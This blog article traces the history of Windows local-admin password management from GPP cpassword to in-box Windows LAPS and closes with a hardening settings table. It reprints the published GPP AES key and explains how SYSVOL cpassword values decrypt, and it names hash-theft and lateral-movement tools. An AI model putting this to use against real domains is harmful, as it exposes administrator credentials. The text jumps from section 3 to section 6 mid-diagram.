Parag Mali - tag: windows

The Twenty-Year Local Admin Password Crisis: From GPP cpassword to Windows LAPS

noreply@paragmali.com (Parag Mali) — Wed, 03 Jun 2026 00:00:00 GMT

**Eleven years separated Microsoft's December 2012 architectural articulation of the shared-local-admin problem from the April 11, 2023 in-box default.** Group Policy Preferences "encrypted" the local Administrator password with an AES key Microsoft published in its own protocol specification (2008-2014). MS14-025 disabled new authoring but deleted no SYSVOL artefacts (2014). Legacy LAPS shipped as a separate MSI with plaintext in `ms-Mcs-AdmPwd` (2015-2023). In-box Windows LAPS finally added CNG DPAPI encryption-at-rest, Microsoft Entra ID backup, and post-authentication rotation. The 2026 default is `BackupDirectory = 2` (AD) or `1` (Entra), `PasswordAgeDays` \<= 30, `ADPasswordEncryptionEnabled` left at its default `True` (the failure mode is silent fallback to plaintext when the domain functional level is below Windows Server 2016, not an off-by-default bit), `ADPasswordEncryptionPrincipal` overridden to a dedicated decryptor group, and `PostAuthenticationActions` left at default `3` (reset + sign out). The residual attack surface is delegated-decryptor compromise, the screenshotted-password OPSEC tail, unmanaged BYOD endpoints, and the multi-decade tail of un-cleaned SYSVOL `cpassword` XMLs that MS14-025 never deleted.

1. One Password, Fifty Thousand Laptops

In May 2012, a domain user with twelve lines of PowerShell could read the local Administrator password for every machine in the organisation. The tool was Get-GPPPassword.ps1 [@obscuresec-gpp-2012]. The "encryption" was AES-256-CBC with a 32-byte key Microsoft had published in its own protocol specification [@ms-gppref-aes-key] -- not leaked, published, as a feature, so that third-party Group Policy implementations could read the format. Eleven years later, on April 11, 2023, Microsoft finally shipped the in-box fix [@tc-windows-laps-ga-2023].

This is an article about those eleven years.

A lateral-movement technique in which an attacker uses the NTLM hash of a captured password directly in an authentication exchange, without recovering the cleartext. If the same local Administrator password is reused across a fleet, one dumped hash unlocks every machine. MITRE catalogues the technique as **T1550.002**.

The pattern was old before 2012. Through the 2000s, the only practical way to provision the local Administrator account on a Windows fleet was to bake one shared password into the reference image and ship the image to every endpoint. Helpdesk knew the password. Pentesters guessed at it. And once Benjamin Delpy's Mimikatz had pulled the hash from a single phished workstation in 2011, the rest of the org fell to a single psexec spray. Microsoft documented the threat model precisely in its December 2012 Mitigating Pass-the-Hash whitepaper [@ms-pth-whitepaper], which named the shared local Administrator credential as the architectural enabler of the entire intrusion class [@mitre-t1550-002].

Microsoft also had a fix. It had shipped one in 2008 with Group Policy Preferences (GPP), the feature that could push a per-machine local-admin password from a Group Policy Object to every endpoint. GPP put the password in an XML file in SYSVOL. SYSVOL was world-readable to every authenticated user in the domain. Microsoft encrypted the password with AES-256-CBC -- and then published the key. The result, after a four-author weaponisation chain in mid-2012 [@sogeti-2012-wayback; @obscuresec-gpp-2012; @rewtdance-gpp-2012; @metasploit-gpp], was that GPP made the original problem worse: instead of one shared password recoverable by physical access to a help-desk laptop, it was now one shared password recoverable by any authenticated domain user with a copy of Get-GPPPassword.ps1. Microsoft "patched" it on May 13, 2014 with MS14-025 [@ms14-025-bulletin], which disabled new authoring but deleted nothing already deployed. Twelve years later, PingCastle still finds the artefacts in production AD [@pingcastle-rules].

The first real fix was Generation 2: the legacy Microsoft LAPS, shipped May 1, 2015 as a separate MSI [@ms-advisory-3062591-wayback]. It stored a per-machine random password in the ms-Mcs-AdmPwd attribute on the computer object, marked CONFIDENTIAL [@adsec-laps-2016]. The directory-side ACL was tighter than SYSVOL, but the deployment surface (install on every endpoint, extend the schema, delegate the OU) capped its real coverage; the password sat in plaintext in AD, one DCSync from "plaintext everywhere"; and a delegation pattern that helpdesks regularly issued -- "All Extended Rights" on the computer OU -- silently included read access to the CONFIDENTIAL attribute [@adsec-laps-2016]. SpecterOps modelled that bypass as the ReadLAPSPassword BloodHound edge on August 7, 2018 [@specterops-bh2].

Generation 3 -- Windows LAPS, in-box, no MSI -- shipped on Patch Tuesday April 11, 2023 [@tc-windows-laps-ga-2023] across Windows 11 22H2 and 21H2, Windows 10 22H2, Windows Server 2022, Windows Server 2019, and Windows Server Annual Channel. Windows Server 2016 was explicitly excluded [@ms-laps-overview]. The new architecture wrapped the password with CNG DPAPI's group key-protector against a configurable principal, exposed Microsoft Entra ID as a peer backup directory [@tc-entra-laps-ga-2023], and added a post-authentication rotation primitive that closed the screenshotted-password OPSEC tail on the next managed-account logon [@ms-laps-policy-settings].

The local Administrator account always has the well-known relative identifier (RID) 500 in the machine's SAM, irrespective of any administrative renaming. Renaming the account at the friendly-name level does not change its SID, which is why Windows LAPS resolves the target account by SID and not by name -- and why an empty AdministratorAccountName policy still finds the right account even on a renamed-built-in host.

Key idea: Microsoft knew the right architecture for managing local Administrator passwords in December 2012, when its own Pass-the-Hash whitepaper named the shared-credential pattern as the architectural enabler of lateral movement. It took until April 11, 2023 to ship that architecture as a Windows default. Eleven years is a long time. The intervening generations each solved part of the previous problem and introduced a new one. The 2026 baseline is, for the first time, an OS-default solution rather than an out-of-band one -- and for the first time, the residual attack surface is the actual surface rather than an artefact of incomplete shipping.

gantt dateFormat YYYY-MM-DD axisFormat %Y title Local-administrator password management on Windows, 1998-2026

section Generation 0 -- Imaged-build era
Shared local admin password baked into image          :gen0, 1998-01-01, 2008-02-26

section Generation 1 -- GPP cpassword
Group Policy Preferences ships in WS2008 RTM           :g1a, 2008-02-27, 2014-05-12
Linda Moore re-posts "Passwords in GPP (Updated)"     :milestone, 2009-04-22, 1d
Sogeti / obscuresec / rewtdance / Metasploit chain    :crit, 2012-04-01, 2012-07-31
MS PtH whitepaper v1 (architecture articulated)       :milestone, 2012-12-01, 1d
MS14-025 disables new authoring (no remediation)      :milestone, 2014-05-13, 1d

section Generation 2 -- Legacy MSI LAPS
Microsoft LAPS GA (KB3062591 MSI)                      :g2a, 2015-05-01, 2023-04-10
Metcalf publishes All-Extended-Rights bypass           :milestone, 2016-08-01, 1d
SpecterOps BloodHound 2.0 ships ReadLAPSPassword edge :milestone, 2018-08-07, 1d

section Generation 3 -- In-box Windows LAPS
Windows LAPS ships in-box (AD backup)                  :crit, 2023-04-11, 2026-12-31
Windows LAPS with Entra ID GA                          :milestone, 2023-10-23, 1d
Win 11 24H2 passphrases and Automatic Account Mgmt    :milestone, 2024-10-01, 1d
Win 11 25H2 Administrator Protection (orthogonal)     :milestone, 2025-11-19, 1d

The article that follows traces the architecture of each generation, the attacks each one solved and each one enabled, and what "standard local admin password management" looks like as a 2026 default. To see why this took twenty years, we have to start in 1998, before Active Directory.

2. Origins: Why Every Workstation Had the Same Local-Admin Password (1998-2008)

Picture a system administrator in 2005. They are holding a CD-R labelled Win-Build-7.iso and a sticky note with a 12-character password. Those two artefacts are the entire local-Administrator-credential lifecycle for ten thousand desktops. The CD will be cloned to a USB drive, the USB drive will reseed Norton Ghost, and Ghost will paint the build onto every new workstation the company buys for the next eight months. Each painted machine will boot with the sticky-note password as its built-in local Administrator. Helpdesk knows the password because they typed it into the image. Five hundred field technicians know the password because they have to be able to recover unmanaged laptops off-network. The pentester who shows up in March will know the password by Tuesday lunch.

This was not a deviation. It was the architecture.

Every Windows machine ships with a built-in local Administrator account whose security identifier ends in the **relative identifier 500**. The RID is constant across machines, languages, and SKUs. Renaming the account changes the friendly name but not the RID, so identity-aware tooling (including Windows LAPS) resolves the account by SID rather than by name. Disabling the account is a configuration choice, not a deletion: the account remains in SAM and can be re-enabled at any time.

The mechanics were a function of how Windows was deployed at scale. Microsoft Sysprep /generalize strips a reference image's machine SID before duplication, but it leaves the SAM intact. Whatever local Administrator password sits in the reference image is the local Administrator password on every endpoint painted from that image. Imaging pipelines were built around this: Norton Ghost in the late 1990s, Microsoft Deployment Toolkit (MDT) and later System Center Configuration Manager Operating System Deployment in the 2000s, all assumed the same SAM. Sean Metcalf's December 2015 SYSVOL retrospective walks the era end-to-end and explains why every shop in the world ended up with a single password [@adsec-gpp-2015].

The operational reality kept the pattern alive. Help-desk needed one known credential to break-glass a laptop that had wandered off the corporate network for six months. Field technicians needed one known credential to swap a failed hard drive on a roof-top kiosk in Houston without phoning home. A known-to-the-org local-admin password was the only realistic fallback path, and the alternative -- a different password per machine, stored somewhere retrievable -- required a retrieval primitive Microsoft had not yet shipped.

The threat model that made the trade-off catastrophic did not get articulated by Microsoft itself until December 2012, in version 1 of the Pass-the-Hash whitepaper [@ms-pth-whitepaper]. The chain was already common knowledge in offensive-security circles: phish a single user, run Benjamin Delpy's 2011-vintage Mimikatz to pull credentials from LSASS, capture the NT hash of the built-in Administrator account, replay that hash to every other host via psexec or wmiexec, and pivot up to the first server an enterprise admin has touched. MITRE catalogues the default-account abuse as T1078.001 [@mitre-t1078-001] and the hash-replay step as T1550.002 [@mitre-t1550-002]. The whitepaper's recommended controls included exactly the architecture Microsoft would eventually ship as LAPS: per-machine random local-admin passwords, rotated frequently, retrievable only by an authorised principal.

The hard part was never the cryptography. It was the operations. A pre-2008 sysadmin who proposed "let's give every workstation a random local-Administrator password" was correctly told that the answer required, at minimum, a directory-scoped retrieval primitive that did not exist; an ACL model that could distinguish "help-desk can read this for their own OU" from "any authenticated user can read this for the whole forest"; and a rotation pipeline that did not depend on the workstation being on the corporate network. Microsoft would not ship those primitives until 2008 (GPP, badly), 2015 (legacy LAPS, well), and 2023 (Windows LAPS, with encryption-at-rest). Until then, "do not get compromised" was the entire mitigation.

The third-party prehistory matters because it set the terms Microsoft would eventually use. PolicyMaker, the engineering parent of what became Group Policy Preferences, was a product of DesktopStandard Corporation that Microsoft acquired in October 2006 [@adsec-gpp-2015]. Thycotic was founded in 1996 by Jonathan Cogley and shipped its Secret Server vault from the mid-2000s [@kuppingercole-cogley]; Lieberman Software (later acquired by Bomgar in January 2018) had operated as Lieberman and Associates since 1978 [@wikipedia-lieberman]; Quest Software was founded in 1987 in Newport Beach, California and was a public company well before the mid-2000s LAPS prehistory began -- its August 14, 1999 NASDAQ IPO saw its shares surge to $47 in a single Wall Street session [@wikipedia-quest; @latimes-quest-ipo-1999]. None of those vendors solved the local-admin-on-every-Windows-machine problem from inside the OS, and Microsoft's own first-party tooling -- restricted groups, logon scripts, Group Policy Object security templates -- offered no rotation primitive at all. The gap was not a knowledge gap; it was a first-party-feature gap.

In February 2008, Microsoft shipped Windows Server 2008. With it came Group Policy Preferences -- and with GPP came a "Local Users and Groups" preference that could push a per-machine local-admin password from a domain GPO to every endpoint in scope. It was the first first-party rotation mechanism Microsoft had ever shipped. It made the problem dramatically worse.

3. Decoration Is Not Encryption: GPP cpassword (2008-2012)

Microsoft Server 2008 reached release-to-manufacturing in February 2008. Group Policy Preferences shipped with it. The new "Local Users and Groups" preference -- alongside Scheduled Tasks, Services, Data Sources, Drive Maps, and Printers -- could push a password from a GPO down to every endpoint in scope. The password went into an XML file in SYSVOL, the domain's replicated policy share. SYSVOL was world-readable to every authenticated user in the domain. The password was AES-256-CBC encrypted in the XML, in a field called cpassword. The key was a 32-byte value published in [MS-GPPREF] section 2.2.1.1.4 [@ms-gppref-aes-key], in Microsoft's own Open Specifications protocol corpus -- as a feature, so that third-party Group Policy implementations could interoperate.

A file share replicated to every Domain Controller in an Active Directory domain, used to distribute Group Policy templates and logon scripts. The default share permissions allow **Read** access to every Authenticated User in the forest. Any file placed in SYSVOL is, operationally, readable by every domain user. The XML attribute defined by `[MS-GPPREF]` that carries an encrypted password inside a Group Policy Preferences item. The encryption is AES-256-CBC with a 16-byte zero IV and a static 32-byte key published in the same protocol specification. The name is short for "ciphertext password" and was the canonical search term for finding deployed credentials in SYSVOL between 2012 and 2026. A loadable component on each Windows endpoint that processes one class of Group Policy setting. Each preference type (Local Users and Groups, Scheduled Tasks, Services, etc.) is implemented by its own CSE, which runs during the Group Policy refresh cycle. CSEs read the policy XML out of SYSVOL, decrypt any `cpassword` field locally, and apply the setting to the host.

Microsoft was not unaware. On April 22, 2009, the Group Policy Team blog re-posted (and updated) a piece by Linda Moore titled "Passwords in Group Policy Preferences (Updated)" [@ms-gp-blog-grouppolicy-2009-wayback]. The phrasing is unambiguous.

the password is not secured. Because the password is stored in SYSVOL, all authenticated users have read access to it. -- Linda Moore, Group Policy Team blog, April 22, 2009 [@ms-gp-blog-grouppolicy-2009-wayback]

The post recommended a list of mitigations: prefer secure mechanisms, audit who can read the SYSVOL share, prefer not to use the field at all. None of those mitigations could rotate the key. None could revoke the static AES-256 key value published in [MS-GPPREF]. Microsoft was telling its customers, in 2009, three years and eight months before the public weaponisation, that the credential they were storing was decryptable by every user in the domain by design.

Three years later, the offensive-security community spent twelve weeks turning the publication into a default-on red-team primitive.

In April and May of 2012, Emilien Girault of Sogeti ESEC published a Python decryptor on the firm's research blog [@sogeti-2012-wayback]. The site has since been retired and the canonical reference is the Wayback Machine capture. In mid-May 2012, Chris Campbell (@obscuresec) published Get-GPPPassword.ps1, a PowerShell port that fetched the relevant XML from SYSVOL, decoded the base64, and called .NET's AES primitives with the published key [@obscuresec-gpp-2012]. The script was folded into PowerSploit at Exfiltration/Get-GPPPassword.ps1, where its header still reads "Author: Chris Campbell (@obscuresec)" [@powersploit-getgpppwd] and explicitly credits Emilien Girault for the underlying research. In June 2012, Ben Campbell (the rewtdance.blogspot.com blog handle), working with scriptmonkey (a named collaborator with his own blog at blog.owobble.co.uk), extended the attack to all six XML wire-format carriers that [MS-GPPREF] permits [@rewtdance-gpp-2012]. The rewtdance post body credits the collaboration verbatim: "Working with scriptmonkey (http://blog.owobble.co.uk/), who already had a DC configured, we verified this theory." On July 25, 2012, the Metasploit module post/windows/gather/credentials/gpp.rb landed [@metasploit-gpp] with five co-authors: Ben Campbell, Loic Jaquemet, scriptmonkey, theLightCosine, and mubix. A companion auxiliary scanner, auxiliary/scanner/smb/smb_enum_gpp.rb, was authored independently by Joshua D. Abraham of Praetorian [@metasploit-smb-enum-gpp].

Note: A widespread folk attribution credits Get-GPPPassword.ps1 to "scriptjunkie." The primary sources do not support that claim. The PowerSploit script header credits Chris Campbell (@obscuresec) [@powersploit-getgpppwd]; the rewtdance June 2012 follow-up is by Ben Campbell with scriptmonkey as a named collaborator (scriptmonkey blogs at blog.owobble.co.uk, not at rewtdance) [@rewtdance-gpp-2012]; the Metasploit gpp.rb module's author field names Ben Campbell, Loic Jaquemet, scriptmonkey, theLightCosine, and mubix [@metasploit-gpp]; and the smb_enum_gpp scanner is by Joshua D. Abraham [@metasploit-smb-enum-gpp]. No primary source ties "scriptjunkie" (Matt Weeks) to the GPP cpassword research chain at all. The names are similar; the people are different.

The whole exercise was twelve lines of code. The interesting part was not the cryptography. The interesting part was that the operation was decryption-by-reference: with a published key, the AES envelope was not protecting a secret, it was carrying a secret in a format the protocol specification told everyone how to read.

``` 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b ``` These bytes are reproduced verbatim from Microsoft's published `[MS-GPPREF]` Group Policy Preferences specification [@ms-gppref-aes-key]. They have appeared in the public Microsoft Open Specifications corpus since the `[MS-GPPREF]` protocol document was first published as part of the Windows Server 2008 protocol-documentation programme; the earliest tangible third-party reuse of the key dates to the April-July 2012 Sogeti / obscuresec / rewtdance / Metasploit research chain [@sogeti-2012-wayback; @obscuresec-gpp-2012; @rewtdance-gpp-2012; @metasploit-gpp]. The key is *not* a secret; it is an interoperability primitive.

ReadSucceeds["Read succeeds (silent CONTROL_ACCESS bypass)"]
ReadFails["Read fails (correctly ACL-gated)"]
Endpoint --> GPRefresh
GPRefresh --> Rotate
Rotate --> SAMWrite
Rotate --> ADWrite
ADWrite --> LDAPRead
LDAPRead --> Bypass
Bypass -- yes --> ReadSucceeds
Bypass -- no --> ReadFails

The other structural limit was the directory's own integrity boundary. The password sat in plaintext in the directory. A stolen NTDS.dit -- obtained via DCSync, NTDSUtil dump, or physical theft of a DC's disk -- exposed every managed local-Administrator password in the forest at once. There was no encryption-at-rest in legacy LAPS, by design. The trust model was "the directory is tier 0 and DCSync is a domain-compromise event already," which is operationally true and architecturally lazy.

Microsoft fixed both of those structural defects on April 11, 2023. The fix shipped in the operating system, with no MSI. We come to it next.

6. The In-Box Era: Windows LAPS (April 11, 2023 to Present)

Patch Tuesday, April 11, 2023. The April cumulative update for Windows 11 22H2 was KB5025239. The Windows 11 21H2 update was KB5025224. Windows 10 22H2 was KB5025221. Windows Server 2022 was KB5025230. Windows Server 2019 was KB5025229. The Server Annual Channel shipped it too. Windows Server 2016 was, and remains, explicitly excluded -- the per-SKU April-2023 cumulative-update KB numbers are catalogued in the Tenable retrospective on the Windows LAPS GA wave [@tc-windows-laps-ga-2023] and the official Microsoft LAPS overview page [@ms-laps-overview]. The MSI was gone. The admpwd.dll Client-Side Extension was gone. In its place: exactly three OS binaries -- laps.dll for core LAPS logic, lapscsp.dll for the Microsoft Intune Configuration Service Provider, and lapspsh.dll for the LAPS PowerShell module -- all shipped together, all part of the OS, all available without installing anything [@ms-laps-concepts-overview; @tc-windows-laps-ga-2023]. The Microsoft Learn laps-concepts-overview page enumerates the three binaries verbatim and lists no fourth.

The most consequential architectural change is the one most often missed.

Note: The legacy admpwd.dll was a Group Policy CSE; its rotation cycle was driven by the GP refresh interval (90 minutes plus jitter on member computers). The new laps.dll is not a CSE. It runs on a hard-coded in-process background timer of approximately one hour inside laps.dll itself -- not a Windows Task Scheduler task, and not configurable. The cited Microsoft Learn page is unambiguous: "Windows LAPS uses a background task that wakes up every hour to process the currently active policy. This task isn't implemented with a Windows Task Scheduler task and isn't configurable." The polling cycle is decoupled from the Group Policy refresh cycle entirely [@ms-laps-concepts-overview]. The implications: the rotation cadence is not configurable below one hour; reducing the GP refresh interval does not accelerate LAPS rotation; the Task Scheduler library will not show a LAPS task because there isn't one; and Windows LAPS will rotate a password on an off-network domain-joined machine the moment it re-establishes line-of-sight to a Domain Controller, regardless of whether a GP refresh has fired.

The new schema added six attributes to the Computer object: msLAPS-Password (the plaintext-fallback location), msLAPS-EncryptedPassword (the CNG-DPAPI-wrapped ciphertext blob), msLAPS-EncryptedPasswordHistory (rotation history), msLAPS-PasswordExpirationTime, msLAPS-EncryptedDSRMPassword (Directory Services Restore Mode account on a DC), and msLAPS-EncryptedDSRMPasswordHistory [@ms-laps-concepts-overview]. The DSRM pair is a Windows-LAPS-only capability; legacy LAPS never covered Domain Controller DSRM accounts. The schema extension is performed once per forest by Update-LapsADSchema, which is idempotent and coexists with the legacy ms-Mcs-AdmPwd attribute [@ms-laps-mig-scenarios].

A seventh attribute, msLAPS-CurrentPasswordVersion, exists in the Windows Server 2025 forest schema only. It is added automatically when the first Windows Server 2025 Domain Controller is promoted -- not by running Update-LapsADSchema -- and is used by laps.dll to mitigate a virtual-machine-snapshot torn-state class. The attribute is read-only as far as the LAPS feature is concerned and is not part of the ReadLAPSPassword BloodHound edge's calculus [@ms-laps-concepts-overview].

Encryption-at-rest with CNG DPAPI

The load-bearing addition is encryption of the password before it leaves the client. The mechanism is the CNG DPAPI group key-protector (still commonly called DPAPI-NG in Microsoft's older documentation) [@ms-cng-dpapi]. The client generates the new local-Administrator password, then wraps the plaintext against a security principal SID using the Active Directory Key Distribution Service (KDS) root key infrastructure. The wrapped blob is the only thing the LDAP write places into msLAPS-EncryptedPassword. To decrypt, a reader Kerberos-authenticates to the KDC; only members of the configured principal group at decryption time can derive the protector. The directory itself never sees plaintext, and a stolen NTDS.dit yields ciphertext only [@ms-laps-concepts-overview].

A protection mechanism in Windows's CNG (Cryptography API: Next Generation) Data Protection API in which a payload is encrypted against a security principal -- typically an AD group SID -- rather than against a local user. Decryption is gated by Kerberos authentication and the principal's group membership at the time of decryption [@ms-cng-dpapi]. Microsoft Learn currently spells the primitive *"CNG DPAPI"* on the canonical reference; older Microsoft documentation and Win32 references continue to use the shorthand *"DPAPI-NG"*. They are the same primitive.

There are two policy settings that gate the encryption path, and the failure modes are operationally important.

Note: Microsoft Learn's laps-management-policy-settings page lists ADPasswordEncryptionEnabled with a default of True [@ms-laps-policy-settings]. The genuine failure mode is not an unset default; it is silent fallback to plaintext in msLAPS-Password when (a) the forest's Domain Functional Level is below Windows Server 2016, or (b) the BackupDirectory value is not 2 (AD). Configure the policy explicitly anyway: the explicit configuration makes the choice visible to policy audits and forces the operator to verify the DFL prerequisite. Do not flip a bit that is already True; do verify the prerequisites that make True work.

Note: When ADPasswordEncryptionPrincipal is unspecified, Windows LAPS wraps the password against the Domain Admins group of the computer's domain [@ms-laps-concepts-overview; @ms-laps-policy-settings]. Most fleets do not want every Domain Admin to be a routine LAPS reader. Configure a dedicated, audited, minimum-membership decryption group (a common naming convention is LAPS-DPAPI-Decryptors) and assign it explicitly. Decryption authority is delegated separately from LDAP read authority; minimising membership of the decryption group is the single most useful hardening lever on a Windows LAPS deployment.

The backup-directory choice

The CSP / GPO node `BackupDirectory` selects where Windows LAPS writes the rotated password. The three valid values are **0** (do not back up; passwords rotate locally but are not retrievable), **1** (Microsoft Entra ID via the `deviceLocalCredentials` resource on Microsoft Graph), and **2** (Active Directory via the `msLAPS-*` attribute set). The values are mutually exclusive per device; a hybrid-joined device can choose either backend but not both [@ms-laps-policy-settings; @ms-laps-entra-scenarios].

The Entra-backup path went generally available on October 23, 2023 [@tc-entra-laps-ga-2023]. With BackupDirectory = 1, the local LAPS component posts the rotated password to the deviceLocalCredentials resource on the device object in Microsoft Entra ID via the Microsoft Graph API [@ms-graph-localcredinfo]. Retrieval is via Get-LapsAADPassword (a thin wrapper over the Graph endpoint), the Entra portal Devices blade, or a direct GET /directory/deviceLocalCredentials/{deviceId} call [@ms-laps-entra-scenarios].

The Entra-backup path has a seven-day minimum for PasswordAgeDays. The AD-backup path's minimum is one day. A tier-0 fleet that targets daily rotation on Entra-joined endpoints will not get daily rotation -- Entra-side policy validation rejects the value. Section 7's baseline table reflects this asymmetry.

Policy surface and the FQ-anchored corrections

Windows LAPS is configurable via Group Policy (for AD-joined hosts), the LAPS Configuration Service Provider at ./Device/Vendor/MSFT/LAPS/Policies/* for Intune-managed hosts [@ms-laps-csp], local policy, or the legacy LAPS GPO if PolicySourceMode selects emulation mode. The settings include BackupDirectory, PasswordComplexity (values 1 through 8), PasswordLength, PasswordAgeDays, PostAuthenticationActions, PostAuthenticationResetDelay, AdministratorAccountName, PassphraseLength, ADPasswordEncryptionEnabled, ADPasswordEncryptionPrincipal, and ADBackupDSRMPassword. On Windows 11 24H2 and Windows Server 2025 and later, the policy surface adds Automatic Account Management settings: AutomaticAccountManagementEnabled, AutomaticAccountManagementNameOrPrefix, AutomaticAccountManagementRandomizeName, AutomaticAccountManagementTarget, and AutomaticAccountManagementEnableAccount [@ms-laps-policy-settings; @ms-laps-account-modes].

The action Windows LAPS performs after the managed account has authenticated to the host. Valid values are **1** (reset the password), **3** (reset and sign out the interactive session; default), **5** (reset and reboot, with a one-minute reboot delay), and **11** (reset, sign out, and terminate remaining processes; Windows 11 24H2 / Windows Server 2025 and later). The action fires after `PostAuthenticationResetDelay` hours have elapsed since the authentication that triggered it [@ms-laps-policy-settings].

Note: A widespread misreading of the older Microsoft documentation lists PostAuthenticationActions as a 1-2-3 enum. The correct enumeration per the current Microsoft Learn reference [@ms-laps-policy-settings] is 1 (reset password), 3 (reset + sign out; default), 5 (reset + reboot), and 11 (reset + sign out + terminate remaining processes; Win 11 24H2 / Server 2025+). Value 11 is not "force shutdown without warning"; interactive users receive the same non-configurable two-minute warning as on value 3, and remaining processes are terminated after the warning expires. SMB sessions on the host are deleted on values 3 and 11.

PostAuthenticationResetDelay defaults to 24 hours. The range is 0 to 24 hours; a value of 0 disables the post-authentication action entirely [@ms-laps-policy-settings]. A tier-0 fleet aiming to close the screenshotted-password OPSEC tail aggressively will configure this down to 1 hour; tier-2 deployments typically leave it at 8 or 24.

PasswordComplexity values 5 through 8 (Windows 11 24H2+ / Windows Server 2025+)

PasswordComplexity values 1 through 4 are character-class modes (uppercase only; uppercase plus lowercase; uppercase plus lowercase plus numbers; and -- value 4, the default -- all four character classes). Value 5 is not a "no vowels or numbers" mode, despite a common folk attribution; it is the "improved readability" four-class variant of value 4, equivalent to value 4 with the visually ambiguous glyphs I, O, Q, l, o, 0, 1 removed and the symbols :, =, ?, * added [@ms-laps-passwords-passphrases]. Microsoft's own documented example password for value 5 is vnJ!!?MTb5=U7Y -- which retains vowels and digits 2 through 9. Values 6, 7, and 8 are passphrase modes drawn from a Microsoft-curated wordlist derived from the EFF Diceware wordlists [@eff-dice; @eff-wordlists-2016] with internal modifications. The published word counts after Microsoft's curation are 7776 / 1276 / 1276 for modes 6 / 7 / 8 respectively; the EFF originals (the EFF Long Wordlist, EFF Short Wordlist #1, and EFF Short Wordlist #2 published July 2016) are 7776 / 1296 / 1296 [@eff-dice; @eff-wordlists-2016]. Values 5 through 8 are all gated on Windows 11 24H2 / Windows Server 2025 and later -- not only values 6-8. The cited Microsoft Learn page reads verbatim for value 5: "The PasswordComplexity setting of '5' is only supported in Windows 11 24H2, Windows Server 2025, and later releases." [@ms-laps-passwords-passphrases]. Passphrase modes exist for DSRM-account scenarios where the password must be typed by a human under duress; the article's section 7 baseline recommends them for tier-0 break-glass accounts.

PowerShell surface and one important cmdlet name

The native LAPS PowerShell module ships eight cmdlets the article calls out by name: Get-LapsADPassword, Reset-LapsPassword, Update-LapsADSchema, Set-LapsADAuditing, Set-LapsADComputerSelfPermission, Set-LapsADReadPasswordPermission, Set-LapsADResetPasswordPermission, and Find-LapsADExtendedRights [@ms-laps-ps-overview; @ms-laps-get-adpassword]. The auditing cmdlet is Set-LapsADAuditing -- not Set-LapsADAuditingSettings, which does not exist as a cmdlet name [@ms-laps-set-adauditing]. The Entra-backup retrieval cmdlet is Get-LapsAADPassword, a wrapper around Microsoft Graph.

Note: A common copy-paste error in deployment runbooks is to write Set-LapsADAuditingSettings. The cmdlet name is Set-LapsADAuditing [@ms-laps-set-adauditing], and the cmdlet emits Directory Service audit event 4662 on configured attribute reads. The SACL it installs targets the LAPS attribute set; you still need the host-side Audit Directory Service Access subcategory enabled on Domain Controllers for the event to land in the Security log.

Migration coexistence

Legacy LAPS and Windows LAPS can coexist on the same host only if they target different local accounts. The documented coexistence pattern is to run legacy LAPS against the built-in RID 500 Administrator while introducing Windows LAPS against a named secondary local-admin account, then retire the legacy MSI once Windows LAPS coverage is verified [@ms-laps-mig-scenarios]. The cross-pointer in section 11 details the seven-step migration sequence.

flowchart TD Tick["laps.dll background timer (~1 hr)"] ReadPolicy["Read effective policy
CSP > GPO > local > legacy emulation"] BackupDir{"BackupDirectory
1 (Entra) / 2 (AD) / 0?"} EntraPath["Write to Graph deviceLocalCredentials
(min PasswordAgeDays = 7)"] ADPath["Write to msLAPS-* attribute set
(min PasswordAgeDays = 1)"] EncryptionGate{"ADPasswordEncryptionEnabled = True
AND DFL ≥ Server 2016?"} Encrypted["msLAPS-EncryptedPassword
(DPAPI-NG, principal = ADPasswordEncryptionPrincipal)"] Plaintext["msLAPS-Password (plaintext fallback)"] SetSAM["Set SAM password on
AdministratorAccountName (empty = RID 500)"] Auth["Managed account authenticates"] PAA{"PostAuthenticationActions
0 / 1 / 3 / 5 / 11?"} Wait["Wait PostAuthenticationResetDelay (default 24 h)"] Action1["1: reset password"] Action3["3: reset + sign out, 2-min warning, DEFAULT"] Action5["5: reset + reboot, 1-min delay"] Action11["11: reset + sign out + terminate procs (24H2 / WS2025+)"] Tick --> ReadPolicy ReadPolicy --> BackupDir BackupDir -- 1 --> EntraPath BackupDir -- 2 --> EncryptionGate BackupDir -- 0 --> SetSAM EncryptionGate -- yes --> Encrypted EncryptionGate -- no --> Plaintext EntraPath --> SetSAM Encrypted --> SetSAM Plaintext --> SetSAM SetSAM --> Auth Auth --> Wait Wait --> PAA PAA -- 1 --> Action1 PAA -- 3 --> Action3 PAA -- 5 --> Action5 PAA -- 11 --> Action11

With the in-box era settled, what does a 2026 deployment actually look like? A short list of policy settings, and a slightly longer list of footguns.

7. The 2026 Baseline as a Settings Table

Architecture is interesting. Audits are not. Here is the 2026 settings table that, in production, separates a deployment that meets its goal from one that quietly does not. Every row carries the policy node, the documented default, the recommended tier-2 value (a typical end-user fleet), the recommended tier-0 value (Domain Controllers and break-glass), and the citation. Cross-check the row against the Microsoft Learn policy-settings page before you ship it.

Policy	Default	Recommended (tier 2)	Recommended (tier 0)	Why	Citation
`BackupDirectory`	`0` (no backup)	`2` (AD) for AD-joined and hybrid-joined; `1` (Entra) for pure Entra-joined	same as tier 2	One directory per device; AD for hybrid where on-prem identity is canonical	[@ms-laps-policy-settings]
`PasswordComplexity`	`4` (all character classes)	`4`	`6` (3-word passphrase) for accounts a human must type under duress (DSRM / break-glass); `4` for automated retrieval	Passphrases for human typing; character-set for tool-only retrieval. Values 5 through 8 are gated on Windows 11 24H2 / Windows Server 2025 and later: value 5 is the "improved-readability" four-class variant of 4 (not a "no vowels" mode); values 6/7/8 are passphrase modes with Microsoft-curated EFF-derived wordlists of 7776 / 1276 / 1276 entries (EFF originals: 7776 / 1296 / 1296)	[@ms-laps-passwords-passphrases; @eff-dice; @eff-wordlists-2016]
`PasswordLength`	`14`	`24`	`24`	Eliminates the rainbow-table threat class	[@ms-laps-passwords-passphrases]
`PasswordAgeDays`	`30` (1-day minimum AD; 7-day minimum Entra; 365-day max)	`30`	`1` (AD) / `7` (Entra; lower fails policy validation)	Caps the blast radius of an undetected credential theft to one rotation window	[@ms-laps-policy-settings]
`PostAuthenticationActions`	`3` (reset + sign out)	`3`	`3`, or `11` on Win 11 24H2+ if process termination is required	Closes the screenshot-leak OPSEC tail on the next managed-account interactive logon. Value `11` is not "force shutdown without warning" -- it is reset + sign out + terminate remaining processes with the same two-minute warning as `3`	[@ms-laps-policy-settings]
`PostAuthenticationResetDelay`	`24` (hours)	`8`	`1`	Trade-off between operational task completion and exposure window	[@ms-laps-policy-settings]
